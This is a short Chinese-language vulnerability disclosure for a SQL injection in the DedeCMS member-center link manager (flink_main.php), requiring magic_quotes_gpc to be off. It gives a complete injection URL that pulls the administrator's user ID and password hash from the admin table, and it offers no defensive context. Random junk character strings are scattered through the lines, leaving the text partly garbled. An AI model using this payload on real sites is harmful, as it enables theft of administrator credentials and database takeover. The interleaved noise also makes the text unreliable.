DedeCMS会员中心SQL注射漏洞
. X( X! T u& R- f3 Q" v需要magic_quotes_gpc = Off
, [" l! j6 K: t) ^会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
# L+ m* S) @. v$ j4 ]0 `- V * A$ T4 R7 T8 q/ p1 A
DedeCMS会员中心书签管理SQL注射漏洞5 @$ z( n! e0 F6 R5 \
成功利用该漏洞可获得管理员密码
- g' Y" K9 D3 ?* b* N" E & W$ R: e3 j/ x- S' g$ |
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码7 ~" x# j+ b- x
1 F' K, x5 k. H( v' Q4 Hhttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
% L/ v" f0 |3 n4 }$ Q |